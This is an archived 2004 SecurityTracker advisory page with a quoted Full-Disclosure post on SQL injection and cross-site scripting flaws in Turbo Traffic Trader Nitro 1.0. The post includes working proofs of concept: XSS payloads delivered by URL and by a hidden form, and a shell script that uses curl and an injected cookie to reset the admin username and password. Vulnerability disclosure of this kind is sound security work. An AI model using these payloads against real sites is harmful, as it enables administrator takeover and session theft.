SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Turbo Traffic Trader Vendors:   TurboTrafficTrader.com
Turbo Traffic Trader Lack of Input Validation Permits Remote SQL Injection and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1011609
SecurityTracker URL:  http://securitytracker.com/id/1011609
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 11 2004
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): Nitro 1.0
Description:   A vulnerability was reported in Turbo Traffic Trader. A remote user can inject SQL commands and can conduct cross-site scripting attacks.

aCiDBiTS reported that the software does not validate user-supplied input in many parameters. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Turbo Traffic Trader software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://URL_to_ttt_script/ttt-webmaster.php?msg[0]=%3Cscript%3Ealert(String.fromCharCode(88)%2BString.fromCharCode(83)%2BString.fromCharCode(83));%3C/script%

It is also reported that if the target system has magic_quotes set to 'off', then a remote user can inject SQL commands.

The vendor was notified without response.

Impact:   A remote user can inject SQL commands to be executed by the underlying database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Turbo Traffic Trader software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.turbotraffictrader.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] Turbo Traffic Trader Nitro v1.0 SQL Injection & XSS Proofs of Concept


+-----------------------------------------------------------------------+
| Turbo Traffic Trader Nitro v1.0 SQL Injection & XSS Proofs of Concept |
| By aCiDBiTS              acidbits@gmail.com               10-Oct-2004 |
+-----------------------------------------------------------------------+

    [                                              ]
	[ Your web application needs a security audit? ]
    [                 Email me !                   ] 
	[                                              ]

------------
Introduction
------------

Turbo traffic trader Nitro v1.0
(http://www.turbotraffictrader.com/php/) "is a fully automated traffic
trading script", "The World's Most Advanced Free PHP Traffic Trading
Script".


---------------
Vulnerabilities
---------------

There is no user input sanitation for many parameters in different
files. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code,
or to steal the user-cookie through XSS for the site where TTT is
running. The SQL injections only can be performed if the site server
has magic quotes set to off. The XSS can be exploited in two ways, one
only works if register globals are set to on the other always do.

Maybe older versions also vulnerable. These are just some examples,
this script has other ways to be exploited. Vendor has been warned but
had no reply from him.


-----------------
Proofs of concept
-----------------

(1.) XSS 
--------

Through GET, only works if register globals are set to on. From your
browser type:

http://URL_to_ttt_script/ttt-webmaster.php?msg[0]=%3Cscript%3Ealert(String.fromCharCode(88)%2BString.fromCharCode(83)%2BString.fromCharCode(83));%3C/script%3E


(2.) XSS
-------- 

Through POST, the victim should click something like this: 

<form action="http://URL_to_ttt_script/ttt-webmaster.php"
method="post"><input name="wm_email" type="hidden" value="fake"><input
name="addtrade" type="hidden" value="1"><input name="siteurl"
type="hidden" value="&lt;script&gt;alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83));&lt;/script&gt;
"><input name="" type="submit" value="Click me !"></form>


(3.) SQL Injection
------------------

With this you can set whatever username and password for TTT script
admin. Only works if the site server has magic quotes turned off.

ttt_sqli_poc.sh
-------8<----------------------8<---------------------8<----------------------------
#!/bin/sh
echo "+----------------------------------------------------------------+"
echo "| Turbo Traffic Trader Nitro v1.0 SQL Injection Proof of Concept |"
echo "| By aCiDBiTS           acidbits@gmail.com           10-Oct-2004 |"
echo "+----------------------------------------------------------------+"
echo ""
if test $# -lt 3; then 
	echo "Usage: $0  URL_to_ttt_script  new_username  new_password"
	echo "Eg:  ./ttt_sqli_poc http://127.0.0.1/ttt john 1234"
	echo ""
	exit
fi
echo "[+] Setting username: $2"
echo "            password: $3"
echo ""
curl -s -o "/dev/null" -b
"ttt_admin=9999999999%7Cfake%7C%27)AS%20pass2,%27fake%27%20as%20username,%27fake%27%20as%20password,(%27fake"
-d "changepass=1&username=$2&password=$3&password2=$3"
"$1/tttadmin/settings.php"
echo "[+] Now go to $1/tttadmin and good login ;-)"
echo ""
echo " \  /"
echo " (Oo)"
echo "//||\\\\"
-------8<----------------------8<---------------------8<----------------------------


---------
Quick Fix
---------

No fix at this moment. Too many parts of the code have to be patched.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC